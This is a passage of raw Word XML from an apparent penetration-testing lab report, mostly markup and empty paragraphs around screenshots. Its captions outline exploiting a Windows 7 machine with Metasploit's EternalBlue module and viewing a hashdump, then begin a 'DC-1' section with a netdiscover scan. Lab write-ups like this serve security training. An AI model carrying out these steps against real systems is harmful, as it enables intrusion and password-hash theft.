                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3786307" cy="3729162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005871C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
      <w:r w:rsidR="007E34ED" w:rsidRPr="005B6BB3">
        <w:t xml:space="preserve"> the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE547C8" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3CFFB46D" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="38B97B4F" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3EBC6B01" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5D61CF04" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="0C4FBB80" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="69D8D851" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3EEF8BD2" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="06D3BC74" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="03F1545C" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="4B2D9106" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="53F2C3E4" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="19533F0B" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6922E2DC" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="36F21CE5" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="4D1B0EB9" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5C3DF2F6" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="4F9EA148" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="139E1FCD" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3436AA61" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="303319D7" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B0372C7" wp14:editId="6E5703FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>300990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5327374" cy="566134"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="128219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98654" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5375527" cy="571251"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="005B6BB3">
        <w:t>Use the eternalblue exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33731556" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="610661FA" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="06CB5B3B" w14:textId="77777777" w:rsidR="00E16CA2" w:rsidRPr="005B6BB3" w:rsidRDefault="00E16CA2" w:rsidP="007E34ED"/>
    <w:p w14:paraId="4CE99693" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="38426EAD" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B414753" wp14:editId="3259EE08">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>314215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5271715" cy="652171"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="198407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75839" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271715" cy="652171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="005B6BB3">
        <w:t>Set the target to Windows 7 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679CC48D" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="042D5009" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5C51235E" w14:textId="77777777" w:rsidR="00963CE9" w:rsidRPr="005B6BB3" w:rsidRDefault="00963CE9" w:rsidP="007E34ED"/>
    <w:p w14:paraId="59641194" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6F035053" w14:textId="3A319492" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F0D6932" wp14:editId="522C96DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>293840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4694914" cy="3601941"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="106088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85416" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4694914" cy="3601941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="005B6BB3">
        <w:t>Run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2D8021" w14:textId="5698ACFF" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="0599551F" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="666345B9" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="0976C4A5" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="2C6299C7" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5DB224BC" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="1638180A" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="00FF0603" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5296546A" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6C31509B" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="1A67F027" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3CEFF0D7" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3955FF51" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6B674389" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="7DB2AB1A" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="1DB4C9BF" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6267F4C5" w14:textId="77777777" w:rsidR="007B173C" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="523DDFE0" w14:textId="77777777" w:rsidR="007B173C" w:rsidRPr="005B6BB3" w:rsidRDefault="007B173C" w:rsidP="007E34ED"/>
    <w:p w14:paraId="3AEE3768" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5FD0563D" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="56894A9C" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="6C002473" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34AD2B20" wp14:editId="725C2C30">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318052</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5502303" cy="1035797"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="187286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63614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5502303" cy="1035797"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="005B6BB3">
        <w:t>View the hashdump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83518D" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="34DC7F24" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="0A0657A8" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="305D77C3" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="63CEF4E7" w14:textId="77777777" w:rsidR="00623517" w:rsidRPr="00623517" w:rsidRDefault="00623517" w:rsidP="00623517"/>
    <w:p w14:paraId="781F43CD" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="55F9F898" w14:textId="77777777" w:rsidR="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="5A3338BA" w14:textId="77777777" w:rsidR="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="23AE914C" w14:textId="77777777" w:rsidR="0037481A" w:rsidRDefault="0037481A" w:rsidP="00245E88"/>
    <w:p w14:paraId="1A3A92F6" w14:textId="77777777" w:rsidR="0037481A" w:rsidRDefault="0037481A" w:rsidP="00245E88"/>
    <w:p w14:paraId="1BB11E01" w14:textId="1836DCA5" w:rsidR="0037481A" w:rsidRDefault="00360E52" w:rsidP="00360E52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc224128487"/>
      <w:r w:rsidRPr="00360E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit DC-1 Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2CCF46F2" w14:textId="647FA49B" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:t>Load the DC-1 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E17CFE" w14:textId="66B5B8CE" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A090CAE" wp14:editId="5309E49F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>30397</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4026611" cy="2051437"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="76229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90207" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4026611" cy="2051437"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3384F643" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0EE847F4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="001D066E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="748C5292" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="01EB2AD6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="148A890A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2B232B6C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2A8ABDE6" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4648961D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="69B3AE20" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2D2BE86E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="08807F88" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t>, to record the Ip address of DC-1 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A94764" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:t>The Ip address is 192.168.1.44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D24B001" w14:textId="250EBFAA" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E40F878" wp14:editId="5A4CE202">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>16731</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5093674" cy="2719347"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="41534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44699" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5093674" cy="2719347"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380E6AF" w14:textId="081191B0" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="331EBCFD" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3D4501AA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1B5DA2BD" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7238E72D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0C09A43C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="68EE4113" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
